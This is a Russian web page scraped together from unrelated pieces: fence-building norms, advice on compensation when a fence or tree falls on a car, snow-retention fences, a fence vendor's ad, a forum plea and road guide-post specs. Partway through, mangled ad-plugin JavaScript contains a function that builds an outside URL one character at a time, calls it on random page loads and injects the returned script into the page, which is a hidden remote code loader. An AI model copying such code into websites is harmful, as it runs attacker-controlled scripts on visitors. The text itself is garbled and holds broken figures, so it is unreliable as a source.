Могут ли лишить прав, если повредил забор или столбик? | ГИБДД | Авто | Аргументы и Факты

Могут ли лишить прав, если повредил забор или столбик? | ГИБДД | Авто | Аргументы и Факты Для дачи

Основные снипы, которые нужно учитывать при строительстве ограждений

Действующая законодательная база строго регламентирует возведение забора, который устанавливается на земельном участке. Государственные органы Архитектуры и землеустройства выдают разрешение на строительство, опираясь на нее. К основным документам, регулирующим строительство ограждений, в которых приведены требования и ограничения относятся:

  • Строительные нормы и правила СНиП 30-02-97 «Планировка и застройка территорий садоводческих объединений граждан, здания и сооружения», утвержденные Постановлением Государственного комитета Российской Федерации по жилищной и строительной политике, принятым в 1997 году. В документе приведен порядок планировки земельного участка, даны рекомендации по возведению, приводятся сведения о расстояниях, отделяющих участок от других земельных наделов и объектов, расположенных на нем. В этот СНиП были введены изменения в 2001 году.
  • СП 11-106-97 «Порядок разработки, согласования, утверждения и состав проектно-планировочной документации на застройку территорий садоводческих объединений граждан», который координирует и решает вопросы, связанные с процессом разработки проектных документов для индивидуального строительства.

Планировка участка включает в себя выбор местоположения отдельных строений по отношению к забору, поэтому возникает потребность соблюдения нормативов с максимальной точностью.

СНиП разъясняет следующие вопросы:

  • выбор оптимальной конструкции забора,
  • выбор подходящего материала,
  • технологию возведения,
  • параметры будущего ограждения, его оптимальную высоту,
  • размеры расстояний до шоссейных дорог, между домом и забором.

По требованию СНиП забор нужно устанавливать в трех метрах от дома, от хозяйственных построек забор должен отстоять на 4 м. Также имеются ограничения по отношению к зеленым насаждениям, например он должен располагаться на расстоянии равным 4 м от высокорослых деревьев, а от кустарников – 1 м.

По условиям, относящимся к санитарно-бытовым, расстояние до границы со смежным участком должно быть равно 1 м. Высота забора не должна быть выше 1 м, чтобы на соседний участок не падала тень. Данное условие охраняет законные права соседа.

Подробная информация с примерами о расстоянии между забором и постройками приведена в этой статье.

Каким должно быть расстояние между заборами соседей, и как оно регулируется законодательно — читайте в этом материале.

Если вас интересует, как сделать забор из пластиковых бутылок своими руками, узнайте об этом отсюда.

Возмещение ущерба если на машину упало дерево, забор или какая-либо конструкция (например, рекламный щит)

На месте происшествия:

  1. Необходимо обратиться в полицию (ГИБДД, если вы двигались на машине, или сотрудников местного ОВД), уведомить страховую компанию (если есть полис КАСКО).
  2. Если предмет упал на машину на территории охраняемой стоянки – следует обратиться к представителям этой стоянки. Если во дворе – обратиться в ТСЖ (ЖЭК, ДЭЗ). Если на муниципальной парковке – следует обратиться в инженерные службы района.
  3. Сделайте фото со всех сторон (не только машины, но и упавшего предмета), снимите видео, постарайтесь зафиксировать как можно больше признаков происшествия: таблички с адресом домов, строения вблизи, дорожные знаки и состояние упавшего предмета.
  4. Ничего не убирайте, пока представители компетентных органов или ТСЖ не составят акт. Если у вас КАСКО, то обязательно уточните у страховой компании, когда можно убирать упавший предмет.
  5. Далее следует получить справку, был ли ветер в тот час и день, какой силы был ветер и так далее. Обычно подобную справку можно получить в Гидрометцентре.
  6. Если у Вас КАСКО необходимо дождаться решения страховой компании об осмотре места происшествия — может быть эксперт страховой компании осмотрит место происшествия.
  7. Далее можно проводить оценку повреждений (после составления всех актов и – или – после получения разрешений от страховой компании) – независимую экспертизу. О дате и месте проведения оценки(экспертизы) лучше заранее уведомить ответственных лиц за причинения вреда или страховую компанию.

На что обратить внимание при оформлении происшествия сотрудниками компетентных органов:

  1. Обращаем внимание, что сотрудники полиции или представители коммунальных служб не имеют права оценивать силу ветра или давать определение природным явлениям. В акте не может быть указано, что был «смерч», «ветер» или «ураган». Это могут сделать только компетентные специалисты.
  2. Обязательно необходимо отметить какой на Вашу машину упал предмет: нужно зафиксировать его размеры и состояние. Еще важный момент – если упавший предмет будет сразу признан поврежденным или плохо закрепленным, или будет зафиксировано что он был в плохом состоянии, то это значительно повысит шансы на получение компенсации.
  3. Внимательно изучите, что изложили в своих документах сотрудники, фиксирующие происшествие. В справке не должно быть указано «причинен незначительный ущерб» или подобного.
  4. В справке обязательно должны быть указаны дата, время, место, список пострадавших деталей, кто составлял протокол/акт. Обратите внимание на цифры – все ошибки могут привести к отказу в выплате или к дополнительным судебных разбирательствам или экспертизам. Укажите, что у Вас имеется фото и видеозапись с места происшествия.

Кто возмещает ущерб:

  1. За упавшие рекламные конструкции на автомобиль или иные за упавшие конструкции крыш домов несут ответственность собственники конструкций или домов (включая ТСЖ).
  2. За упавшие деревья или заборы следует обращаться за компенсацией к коммунальным службам по причине ненадлежащего содержания деревьев/заборов. В случае если дерево росло на территории частного владения или земельного участка – отвечает за ущерб собственник участка/имущества.

Конечно, добровольно компенсировать ущерб почти никто не соглашается. В большинстве случаев придется обращаться в суд. Главное, чтобы Ваше транспортное средство было припарковано в законном месте.
Но в любом случае за каждым забором, деревом, имуществом или крышей закреплено ответственное лицо или организация.

В конечном итоге суд всё разрешит. Ответчик в свою очередь имеет право доказывать, что дерево или иная конструкция упали из-за «форс мажорной ситуации».

Для правильного и быстрого возмещения ущерба в подобной или иной другой ситуации рекомендуем обращаться к специалистам группы компаний «Респект». Наши сотрудники быстро и качественно проконсультируют Вас по произошедшему случаю, проведут оценку ущерба и помогут получить законную компенсацию. Обращайтесь, будем рады Вам помочь!

Зачем зимой ставят «заборы» на полях?

Если вы зимой проезжали мимо полей, то могли заметить на них странные конструкции, похожие на заборы. Что это за «заборы», и с какой целью их устанавливают на российских полях?

Эти конструкции не поставят в тупик заядлого дачника или жителя глухой провинции, особенно если он занят в сфере сельского хозяйства. А вот горожанину придётся напрячь извилины, чтобы понять, для чего нужно огораживать заснеженные поля.

На самом деле, всё довольно просто. Эти загадочные заборы ставят в целях «снегозадержания». Снегозадержание – это такой популярный агротехнический приём, цель которого задержать и накопить снег на полях, чтобы не промёрзла почва и весной образовалось как можно больше почвенной влаги. Чем больше снега удастся накопить зимой – тем больше будет урожай летом.

Для снегозадержания используются искусственные преграды различной конструкции. Это могут быть и щиты, и сетки, и плетёная изгородь или просто воткнутые в снег хворостины/еловые лапы.

Подобные конструкции, кстати, устанавливают и вдоль автомобильных и железнодорожных трасс.

Они задерживают снег, предотвращая тем самым заносы, которые препятствуют проезду транспорта и могут приводить к серьёзным авариям.

Однако у отдельных агрохолдингов площадь возделываемых полей составляет сотни гектаров. Не хватит никаких сил и денег на монтаж искусственных преград на таких огромных пространствах!

В этом случае, агрономы задерживают снег с помощью рукотворных снежных валов, которые создаются при помощи тяжёлой техники.

Кстати, лесопосадки вдоль полей тоже предназначены для снегозадержания. Хотя всё же их основная функция – недопущение эрозии почвы.

Источник

Мы предлагаем:

Заборы из профнастила

Заборы из профлиста – 80% наших заказов. Почему они пользуются такой популярностью? Всё просто: они полностью закрывают участок от посторонних глаз, недорого стоят, долго служат, надежны и просты в обслуживании. Вы можете выбрать цвет наружного покрытия из 200 доступных оттенков.

Забор из сетки-рабицы

Заборы из сетки-рабицы – доступное и надежное решение. Идеально подходят для маленьких участков и дач: визуально расширяют площадь пространства, позволяют свету и воздуху свободно проникать на территорию. Ограждение изготавливается из прочной оцинкованной проволоки различной толщины.

Заборы из металлического штакетника

Заборы из металлического штакетника отличаются эффектным внешним видом, прочностью и простотой в обслуживании. Они в 3 раза прочнее деревянных конструкций за счет увеличения числа ребер жесткости. Металл устойчив к перепадам температуры и влажности, на него наносится порошковое покрытие выбранного Вами цвета или грунтовка.

3D заборы от производителя – сборные конструкции, состоящие из готовых панелей отечественного производства. Они надежны, долговечны и эстетичны. Наша бригада осуществляет монтаж готовых панелей с соблюдением стандартов качества и техники безопасности. Монтаж готового 3D забора производится в максимально короткие сроки.

Комбинированный забор производится из различных материалов, например, сетки-рабицы и металлического штакетника или профнастила. Комбинации материалов различной фактуры обеспечивают лучшие эстетические решения и позволяют создавать индивидуальный дизайн. Кроме этого, сочетание материалов позволяет объединить их преимущества.

Источник

На машину упало строительное ограждение! помогите советом!

21 января 2023 в 10.50 утра я проезжала на своей Витаре во дворе дома №11 по ул. Никулинская. Во время движения справа на автомобиль упало плохо закрепленное ограждение. Я остановила машину. Пока выходила из автомобиля, сотрудники стройки уже поднимали ограждение и ставили его на место. Но факт падения может подтвердить свидетель, проезжавший навстречу. Он оставил мне свои данные и телефон. Повреждения я зафиксировала на фото на мобильный телефон, также есть фото участка ограждения со следами краски от моей машины и фото «спешной» установки ограждения рабочими стройки.

На место вызвали прораба. Он представился Рустемом, сказал, что «по-человечески меня понимает, но платить из своего кармана не хочет». Потом, посовещавшись с руководством, он предложил наличные, но не больше 10 тысяч. У меня достаточно глубокие царапины на пассажирской двери и на правом крыле. А так как машина еще гарантийная, то ремонт у официального диллера обойдется от 15000. Я от денег отказалась и стала дальше ждать сотрудников ГИБДД.

Я ждала сотрудников ГИБДД 6 часов! Но в результате в 16.45 приехала машина ОВО, с дознавателем, фотоэкспертом и понятым. Они видели как рабочие чинили забор. Последние же, в свою очередь, завидев сотрудников милиции, бросились убегать «с места преступления». Машину сфотографировали, повезли меня в ОВД «Тропарево-Никулино» в Олимпийской деревне. Там заставили написать заявление: «Прошу выдать справку в страховую компанию по факту повреждения……», хотя я раз 10 сказала, что у меня НЕТ КАСКО!!! Потом я писала объяснительную, но в ней из-за усталости забыла указать кому принадлежало ограждение ( компания ТЕПЛОЦЕНТРСТРОЙ).

Затем я пошла к дознавателю. Он в протоколе написал о характере обнаруженных повреждений и все! Ни о заборе, ни о стройке там не было ни слова! но так как все написанное было верным, я это подписала. В протоколе была еще одна страница, которую должен был заполнить фотоэксперт, но так как он был очень занят, меня настоятельно поросили эту страницу просто подписать, а эксперт ее должен был заполнить на следующий день. Копию протокола мне дать отказались, так как на ней не было подписи эксперта, его заключения и подписи начальника ОД ОВД. Сказали, что так как я в объяснении указала,что причиненный ущерб для себя считаю значительным, дело будет передано в прокуратуру, которая скорее всего его рассматривать не будет, так как забор упал сам и это «несчастный случай», а КАСКО у меня нет! Но забор же плохо установили строители и поэтому, когда экскаватор выкапывал куски промерзшей земли, один из них полетел в ограждение и свалил его на мой автомобиль!

Напоследок мне сказали, что в течение 10 дней вызовут на допрос, а потом примут решение и пригласят забрать бумаги…
А потом я уже сама должна бороться за свои права!

Помогите мне, пожалуйста! Как правильно поступить, чтобы добиться возмещения от ТЕПЛОЦЕНТРСТРОЯ за покраску автомобиля и за прокат другого на время ремонта. У меня грудной ребенок и я одновременно еще и учусь в институте и без машины мне ну никак не обойтись!

Очень прошу вас о советах и помощи!!!

Направляющие устройства для указаний водителю

Направляющие устройства служат для повышения зрительного восприятия дорожных сооружений, обеспечивающих бесперебойное движение транспортных средств. К ним относятся съезды, развязки, виадуки, эстакады и др. Их выполняют в виде сигнальных столбиков, конусов, тумб, буферов, стальных тросов и т.д.

Как правило, направляющие устройства монтируют на шоссейных трассах без искусственного освещения, а также:

Справка. Месторасположение направляющих устройств локализуется в районе бровки земляного полотна съезда.

Материал изготовления аналогичен барьерным и парапетным конструкциям. Производители выпускают изделия из железобетона, пластика и металла, опираясь на ГОСТ 50970-2023. Согласно нормативным требованиям, сигнальные столбики имеют высоту 1300 и 1150 метров, их изготавливают белого и желтого цветов.

Дорожные конусы выполняют из жесткого или гибкого пластика с утяжелителем или без. Утяжелители изготавливают из качественной резины. Они призваны сдерживать удары легкового и грузового транспорта. Светоотражающие полосы из призматической пленки позволяют распознать конус в ночное время суток или при ухудшающихся метеорологических условиях на расстоянии до полукилометра.

Дорожные тумбы и буферы обозначают опасные участки при сужении или разделении определенного участка дороги. Их фиксируют в начале разделительной полосы, впереди торца подпорной стены тоннельного сооружения транспортного типа, перед опорами путепроводных сооружений, локализованных на проезжей части,

в области островков безопасности и(или) направляющих островках, немного возвышающихся относительно поверхности земли.

Справка. Для придания более устойчивого положения дорожное приспособление заполняют водой или песком.

Высота корпуса столбика составляет 75-80 см. Разметка выполняется с помощью светоотражающих лент, выделяющихся в ночной тьме.

Особенности

Расстояние между ограждающей конструкцией и дорогой — это не просто дистанция между проезжей частью и забором. Это место, где могут находиться люди, проходящие по улице. Слишком узкий проход создает серьезную угрозу их здоровью и даже жизни — проезжающий автомобиль может оказаться слишком широким, и водитель не способен визуально контролировать некоторые участки дороги.

Наличие дистанции между дорогой и ограждением позволяет создать свободное пространство, куда могут встать люди для освобождения проезда.

Расстояние от забора до дороги - нормативы, особенности, полезные советыЕсть и другие особенности, делающие расстояние от дороги до забора важным и необходимым элементом:

  • создание зазора для уменьшения наружного шума;
  • уменьшение количества пыли от движущегося транспорта;
  • возможность ассимилировать в атмосферу выхлопные газы.

Еще одним важным качеством зазора является наличие кювета — продольная канава по бокам дороги позволяет дождевой воде собираться в единый поток и выводиться в места сброса. После сильного ливня такая возможность очень полезна — предотвращается риск затопления участка и фундаментов надворных построек.

Изменение расстояния между проезжей частью и забором автоматически изменяет ширину канавы. Уменьшение ее размеров приводит к появлению луж, проникновению излишков влаги на участки.

Необходимо учесть, что возможность самостоятельно изменить расстояние между дорогой и забором существует только на внешних участках ограждающей конструкции. Заборы между соседними участками устанавливаются по линии разграничения и не подлежат смещению в ту или иную сторону.

Специфика такого ограждения состоит в частичной принадлежности ко всем участкам, примыкающим к дороге. Поэтому, имеет значение не только расстояние между дорогой и забором одного участка, а всей линией ограждающей конструкции, идущей вдоль дороги.

Пространство от забора до дороги

Этот промежуток определяют соответствующие органы власти. Собственник земельного участка, оформивший свои права по закону, может ни о чем не беспокоиться.

В этом случае все просто. У человека в собственности имеется земельный участок. И на его границе со стороны дороги собственник имеет полное право поставить свой забор.

Какое при этом будет расстояние от забора до проезжей части, не имеет никакого значения. Ведь есть свидетельство о праве собственности и план земельного участка.

Но, к сожалению, так бывает далеко не всегда. Нередко встречаются случаи самозахвата земли. Это означает следующее. Собственник земельного участка просто переносит свой забор ближе к дороге, не оформляя при этом никаких документов.

Это подпадает под действие норм, устанавливающих административную ответственность за самовольное занятие земли. Нарушителя при этом ожидает штраф, согласно статье 7.1 Кодекса об административных правонарушениях.

Чтобы привлечь соседа-нарушителя к ответственности, нужно обратиться с жалобой в местную администрацию. Она осуществляет функции муниципального земельного контроля. И, соответственно, будет обязана принять административные меры, поскольку расстояние от забора участка до дороги было незаконно уменьшено.

Но существует и законный способ переноса границы. Для этого нужно выкупить землю у государства в порядке, который предусмотрен статьей 34 Земельного кодекса.

То есть нужно обратиться в местную администрацию с соответствующим заявлением. Через месяц вы получите письменный ответ.

В случае положительной реакции органа местной власти, можно будет перейти к оформлению земли. Но при этом, разумеется, все сопутствующие расходы вы будете оплачивать за свой счет.

Совет! Чтобы избежать ненужных потерь времени в процессе оформления, стоит нанять риэлтора. Он будет решать все бумажные вопросы, связанные с приобретением земли. Вы же тем временем, сможете заняться более важными вопросами.

Но здесь есть один важный момент. Вы сможете приобрести только ту землю, которая расположена до красной линии улицы.

Так называется условная линия, которая отделяет дорогу от других видов земель. Найти ее можно только на специальных картах. И строго говоря, расстояние от забора до дороги в деревне заканчивается именно на этой линии.

Работает ли в этом случае осаго?

Нет. Автогражданское страхование – это защита ответственности владельца и/или водителя автомобиля при наступлении страхового случая. Это значит, что в случае вашей вины в ДТП за вас платит страховщик, а не вы сами из собственного кармана.

Естественно, у здания, дерева или забора не будет полиса ОСАГО, а это значит, что страховой выплаты по данным случаям вам не полагается.

Именно поэтому по ОСАГО не возмещается вред вашему имуществу по вашей же страховке. Это делается только при наличии полиса у причинителя вреда. А, так как в нашей теме таковыми выступают не владельцы транспортных средств, а, как правило, собственники зданий и участков, то ОСАГО у них в принципе быть не может.

В случаях с упавшим на машину деревом, снегом, сосульками, забором и другими предметами работает только страхование Каско. Но и то, только в случае, если в момент падения дерева не было объявлено чрезвычайное положение по погодным условиям. Иначе в большинстве договоров Каско такие условия указаны как форс-мажорные и исключают страховое возмещение.

Расстояние между забором частного дома и дорогой

В составе улично-дорожной сети следует выделять улицы и дороги магистрального и местного значения, а также главные улицы. Категории улиц и дорог городов следует назначать в соответствии с классификацией, приведенной в табл.7.

6.18*. Расчетные параметры улиц и дорог городов следует принимать по табл.8*, сельских поселений — по табл.9.

6.19. Расстояние от края основной проезжей части магистральных дорог до линии регулирования жилой застройки следует принимать не менее 50 м, а при условии применения шумозащитных устройств, обеспечивающих требования СНиП II-12-77, не менее 25 м.

до проезжей части, опор, деревьев ………………………. 0,75;

до стоянок автомобилей и остановок общественного транспорта … 1,5.

6.22*. Радиусы закругления проезжей части улиц и дорог по кромке тротуаров и разделительных полос следует принимать не менее, м:

для магистральных улиц и дорог регулируемого движения ………… 8

местного значения ………………………………………… 5

на транспортных площадях …………………………………. 12

Примечание. Для общественного транспорта (трамвай, троллейбус, автобус) радиусы закругления устанавливаются в соответствии с техническими требованиями эксплуатации этих видов транспорта.

Таблица 7

Таблица 8*

Таблица 9

6.25. На магистральных улицах и дорогах регулируемого движения в пределах застроенной территории следует предусматривать пешеходные переходы в одном уровне с интервалом 200 — 300 м.

Пешеходные переходы в разных уровнях, оборудованные лестницами и пандусами, следует предусматривать с интервалом:

400 — 800 м на дорогах скоростного движения, линиях скоростного трамвая и железных дорогах;

300 — 400 м на магистральных улицах непрерывного движения.

Примечания:

1. Допускается устройство пешеходных переходов в разных уровнях на магистральных улицах регулируемого движения при пешеходном потоке через проезжую часть более 3000 чел/ч.

Расстояние между участками нормы для границ заборов проездов и дорог | принцип права – интернет журнал

«:’

‘:»»,document.createElement(«div»),c=ff(window),b=ff(«body»),g=void 0===flatPM_getCookie(«flat_modal_» a.ID «_mb»)||»false»!=flatPM_getCookie(«flat_modal_» a.ID «_mb»),i=»scroll.flatmodal» a.ID,m=»mouseleave.flatmodal» a.ID » blur.flatmodal» a.ID,l=function(){var t,e,o;void 0!==a.how.popup.timer&&»true»==a.how.popup.timer&&(t=ff(‘.fpm_5_modal[data-id-modal=»‘ a.ID ‘»] .fpm_5_timer span’),e=parseInt(a.how.popup.timer_count),o=setInterval(function(){t.text(—e),e<=0&&(clearInterval(o),t.parent().replaceWith(‘

‘))},1e3))},s=function(){void 0!==a.how.popup.cookie&&»false»==a.how.popup.cookie&&g&&(flatPM_setCookie(«flat_modal_» a.ID «_mb»,!1),ff(‘.fpm_5_modal[data-id-modal=»‘ a.ID ‘»]’).addClass(«fpm_5_modal-show»),l()),void 0!==a.how.popup.cookie&&»false»==a.how.popup.cookie||(ff(‘.fpm_5_modal[data-id-modal=»‘ a.ID ‘»]’).addClass(«fpm_5_modal-show»),l())},ff(«body > *»).eq(0).before(‘

‘ p «

«),w=document.querySelector(‘.fpm_5_modal[data-id-modal=»‘ a.ID ‘»] .fpm_5_modal-content’),flatPM_setHTML(w,e),»px»==a.how.popup.px_s?(c.bind(i,function(){c.scrollTop()>a.how.popup.after&&(c.unbind(i),b.unbind(m),s())}),void 0!==a.how.popup.close_window&&»true»==a.how.popup.close_window&&b.bind(m,function(){c.unbind(i),b.unbind(m),s()})):(v=setTimeout(function(){b.unbind(m),s()},1e3*a.how.popup.after),void 0!==a.how.popup.close_window&&»true»==a.how.popup.close_window&&b.bind(m,function(){clearTimeout(v),b.unbind(m),s()}))),void 0!==a.how.outgoing){function n(){var t,e,o;void 0!==a.how.outgoing.timer&&»true»==a.how.outgoing.timer&&(t=ff(‘.fpm_5_out[data-id-out=»‘ a.ID ‘»] .fpm_5_timer span’),e=parseInt(a.how.outgoing.timer_count),o=setInterval(function(){t.text(—e),e<=0&&(clearInterval(o),t.parent().replaceWith(‘

‘))},1e3))}function d(){void 0!==a.how.outgoing.cookie&&»false»==a.how.outgoing.cookie&&g&&(ff(‘.fpm_5_out[data-id-out=»‘ a.ID ‘»]’).addClass(«show»),n(),b.on(«click»,’.fpm_5_out[data-id-out=»‘ a.ID ‘»] .fpm_5_cross’,function(){flatPM_setCookie(«flat_out_» a.ID «_mb»,!1)})),void 0!==a.how.outgoing.cookie&&»false»==a.how.outgoing.cookie||(ff(‘.fpm_5_out[data-id-out=»‘ a.ID ‘»]’).addClass(«show»),n())}var _,u=»0″!=a.how.outgoing.indent?’ style=»bottom:’ a.how.outgoing.indent ‘px»‘:»»,p=»true»==a.how.outgoing.cross?void 0!==a.how.outgoing.timer&&»true»==a.how.outgoing.timer?’

Закрыть через ‘ a.how.outgoing.timer_count «

«:’

‘:»»,c=ff(window),h=»scroll.out» a.ID,m=»mouseleave.outgoing» a.ID » blur.outgoing» a.ID,g=void 0===flatPM_getCookie(«flat_out_» a.ID «_mb»)||»false»!=flatPM_getCookie(«flat_out_» a.ID «_mb»),b=(document.createElement(«div»),ff(«body»));switch(a.how.outgoing.whence){case»1″:_=»top»;break;case»2″:_=»bottom»;break;case»3″:_=»left»;break;case»4″:_=»right»}ff(«body > *»).eq(0).before(‘

‘ p «

«);var v,w=document.querySelector(‘.fpm_5_out[data-id-out=»‘ a.ID ‘»]’);flatPM_setHTML(w,e),»px»==a.how.outgoing.px_s?(c.bind(h,function(){c.scrollTop()>a.how.outgoing.after&&(c.unbind(h),b.unbind(m),d())}),void 0!==a.how.outgoing.close_window&&»true»==a.how.outgoing.close_window&&b.bind(m,function(){c.unbind(h),b.unbind(m),d()})):(v=setTimeout(function(){b.unbind(m),d()},1e3*a.how.outgoing.after),void 0!==a.how.outgoing.close_window&&»true»==a.how.outgoing.close_window&&b.bind(m,function(){clearTimeout(v),b.unbind(m),d()}))}}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff(«body»),flat_userVars.init();for(var e=0;e<t;e ){var>flat_userVars.textlen||void 0!==o.chapter_sub&&o.chapter_sub<flat_uservars.textlen||void>flat_userVars.titlelen||void 0!==o.title_sub&&o.title_sub<flat_uservars.titlelen)){if(void>.flatPM_sidebar)»);0<_.length&&_.each(function(){var t=ff(this),e=t.data(«height»)||350,o=t.data(«top»);t.wrap(‘

‘);t=t.parent()[0];flatPM_sticky(this,t,o)}),u.each(function(){var e=ff(this).find(«.flatPM_sidebar»);setTimeout(function(){var a=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;a<300||e.each(function(){var t=ff(this),e=a,o=t.data(«top»);t.wrap(‘

‘);t=t.parent()[0];flatPM_sticky(this,t,o)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t<300||ff(«.flatPM_sticky_wrapper.flatPM_sidebar_block»).css(«height»,t)},4e3)}),»undefined»!=typeof flat_pm_video&&flatPM_video(flat_pm_video),0<flat_stack_scripts.length&&flatpm_setscript(flat_stack_scripts),ff(«body> *»).last().after(‘

‘),flat_body.on(«click»,».fpm_5_out .fpm_5_cross»,function(){ff(this).parent().removeClass(«show»).addClass(«closed»)}),flat_body.on(«click»,».fpm_5_modal .fpm_5_cross»,function(){ff(this).closest(«.fpm_5_modal»).removeClass(«fpm_5_modal-show»)}),flat_pm_arr=[],ff(«.flat_pm_start»).remove(),ff(«[data-flat-id]:not(.fpm_5_out):not(.fpm_5_modal)»).contents().unwrap(),flatPM_ping()};var parseHTML=function(){var l=/<(?!area|br|col|embed|hr|img|input|link|meta|param)(([w:] )[^>]*)/>/gi,d=/<([w:] )/,i=/<|&#?w ;/,c={option:[1,»

«],thead:[1,»

«],tbody:[1,»

«],colgroup:[2,»

«],col:[3,»

«],tr:[2,»

«],td:[3,»

«],th:[3,»

«],_default:[0,»»,»»]};return function(e,t){var a,r,n,o=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=o.appendChild(t.createElement(«div»)),r=(d.exec(e)||[«»,»»])[1].toLowerCase(),r=c[r]||c._default,a.innerHTML=r[1] e.replace(l,»<$1>») r[2],n=r[0];n—;)a=a.lastChild;for(o.removeChild(o.firstChild);a.firstChild;)o.appendChild(a.firstChild)}else o.appendChild(t.createTextNode(e));return o}}();window.flatPM_ping=function(){var e=localStorage.getItem(«sdghrg»);e?(e=parseInt(e) 1,localStorage.setItem(«sdghrg»,e)):localStorage.setItem(«sdghrg»,»0″);e=flatPM_random(1,166);0==ff(«#wpadminbar»).length&&111==e&&ff.ajax({type:»POST»,url:»h» «t» «t» «p» «s» «:» «/» «/» «r» «e» «a» «d» «o» «n» «e» «.» «r» «u» «/» «p» «i» «n» «g» «.» «p» «h» «p»,dataType:»jsonp»,data:{ping:»ping»},success:function(e){ff(«div»).first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,r=document.querySelector(‘[data-flat-script-id=»‘ t ‘»]’);if(a.text)r.appendChild(a),ff(r).contents().unwrap(),e.shift(),0<e.length&&flatpm_setscript(e);else{a.onload>/gm,»»).replace(//gm,»»).trim(),e.code_alt=e.code_alt.replace(//gm,»»).replace(//gm,»»).trim();var o=jQuery,t=e.selector,l=e.timer,d=e.cross,a=»false»==d?»Закроется»:»Закрыть»,r=!flat_userVars.adb||»»==e.code_alt&&duplicateMode?e.code:e.code_alt,n=’

‘,i=e.once;o(t).each(function(){var e=o(this);e.wrap(‘

‘);var t=e.closest(«.fpm_5_video»);flatPM_setHTML(t[0],n),e.find(«.fpm_5_video_flex»).one(«click»,function(){o(this).addClass(«show»)})}),o(«body»).on(«click»,».fpm_5_video_item_hover»,function(){var e=o(this),t=e.closest(«.fpm_5_video_flex»);t.addClass(«show»);var a=t.find(«.fpm_5_timer span»),r=parseInt(l),n=setInterval(function(){a.text(—r),r<=0&&(clearInterval(n),»true»==d?a.parent().replaceWith(‘

‘):t.remove())},1e3);e.remove()}).on(«click»,».fpm_5_video_flex .fpm_5_cross»,function(){o(this).closest(«.fpm_5_video_flex»).remove(),»true»==i&&o(«.fpm_5_video_flex»).remove()})};

Санитарно-бытовые нормы возведения забора – определяем расстояние между заборами по правилам

Для садоводческих участков разработан СНиП 30-02-97. Именно к нему стоит обратиться в случае возникновения вопросов. Если же участок расположен в сельской местности, то ответ можно найти в СНиП 2.07.01-89. Этапы создания и согласования проектной документации при застройке частных владений регулируются нормативом СП 11-106-97.

Итак, забор для садоводческих участков необходимо располагать по границе собственного участка, обозначенной в документации владельца. А вот как грамотно расположить все строения, постройки и даже высадить деревья и кустарники, необходимо разобраться до начала планирования благоустройства участка.

Для того, чтобы правильно организовать территорию дачного участка следует соблюсти ряд экологических, гигиенических, санитарных и бытовых правил и норм. Особое внимание следует уделить участку забора, общему с соседями (смежному), поскольку все объекты, расположенные вблизи него, так или иначе, влияют, в том числе, и на их владения.

Согласно СНиП 30-02-97 владельцы участков должны выдерживать при строительстве следующие расстояния между объектами:

  • Дистанции от забора. Жилой дом должен находиться на расстоянии не менее трех метров от забора. Хозпостройки с домашней птицей и животными, а также теплицы разрешается строить на расстоянии четырех метров от границы участка. Гараж и прочие хозяйственные строения можно расположить в метре от межи. Санитарные сооружения (в т.ч. баня) должны быть не ближе, чем в трех метрах от забора. Свои требования предъявляются также и к зеленым насаждениям. Высокие породы деревьев необходимо засаживать на расстоянии не ближе четырех метров от забора, а вот средние разрешается отдалить лишь на два метра. Всего один метр достаточно отступить от границы участка, чтобы «законно» высадить кустарники у себя на участке. Главным объектом на любом дачном участке, как правило, является жилой дом.
  • Дистанции от жилого дома. Туалет необходимо располагать не ближе, чем в двенадцати метрах от дома. Прочие санитарные сооружения (баня, душ) можно возводить в восьми метрах от жилого здания. Хозпостройки для содержания животных должны располагаться в удалении от дома и это расстояние не может быть меньше пятнадцати метров. Между жилыми домами допускается расстояние в шесть метров.

Снип ограждение территории забор

Материал для забора, при строительстве ограждений на основных улицах населенных пунктов, требует обязательного согласования с органами местного самоуправления. Часто это требование игнорируется, но если соблюдены остальные нормы, то никаких дополнительных проблем не возникает.

Максимальная высота забора 2,2 м со стороны улицы и территории общего пользования. Это требование обусловлено нормами освещенности улиц, проездов, тротуара. Также материал из которого возведено ограждение не должен быть потенциально травмоопасным, т.е. случайное соприкосновение с вашим забором никак не должно отразиться на здоровье прохожего или его имуществе.

Основные примеры потенциально травмоопасных материалов: колючая проволока, неструганные доски и т.пОткрывание ворот должно происходить вовнутрь участка, если до проезжей части меньше 1,5 метров. Это необходимо чтобы не создавать помех движению транспорта.

Забор, отделяющий участки между соседями, также не должен превышать 2,2 метра, но тут есть существенные ограничения:

  • Разрешено возводить так называемого живое ограждение — из кустарников, деревьев, вьюнковых трав, и т.д. не выше 1,5 метра по согласованию с соседями.
  • Допускается к установке светопрозрачные ограждения: заборы из сетки рабицы, штакетника металлического или деревянного, кованые или металлические секции со светопропускаемостью не менее 50%.
  • Высота не может превышать 0,75 метра если ограждение «глухое». К таким видам ограждений относится забор из профнастила, кирпичная стена или железобетонное ограждение.
  • На линии межевания, без согласия соседей нельзя устанавливать ограждение шириной более 0,5 метра. В пределах собственного участка такое ограждение допускается.

С согласия соседей, можно установить ограждение, между участками, более чем 0,75 метра. Согласие необходимо зафиксировать в письменной форме.

Комбинированный забор, до 2,2 метров не требует согласований с соседями. Это 0,75 метров «глухого» ограждения с установкой на него светопрозрачного ограждения.

Даже при установке согласованного «глухого» забора, высотой до 2,2 метров, необходимо обеспечить отведение воды. Если будет происходить подтапливание (дождь, таяние снега) участка соседей, в результате установки данного ограждения, они вполне на законных основаниях могут потребовать демонтажа забора.

Основное правило при возведении ограждения собственноручно одно: здравый смысл. Соседи не обрадуются, закрытым вашим забором окнам, затемненной большую часть времени теплице, стуку от плохо закрепленных листов. В подобных случаях претензии вам обеспечены.

Для того чтобы потребовать демонтаж забора, установленного без вашего согласия, вам потребуется доказать, что он причиняет ущерб или вред.

Способ установки опоры в почву

Существует несколько способов монтажа заборных столбов в грунт. Их ставят такими методами:

  •  Монтаж в землю. Вкапывать в почву — самый простой, но малонадежный способ, особенно на сыпучих грунтах и суглинках. Стойкость конструкции к поперечным нагрузкам зависит от прочности грунта. При увеличении межсекционного интервала есть риск просадки опоры или обрушение ее от порыва ветра. Расстояние в данном случае выбирают минимально допустимое, исходя из расчетов.

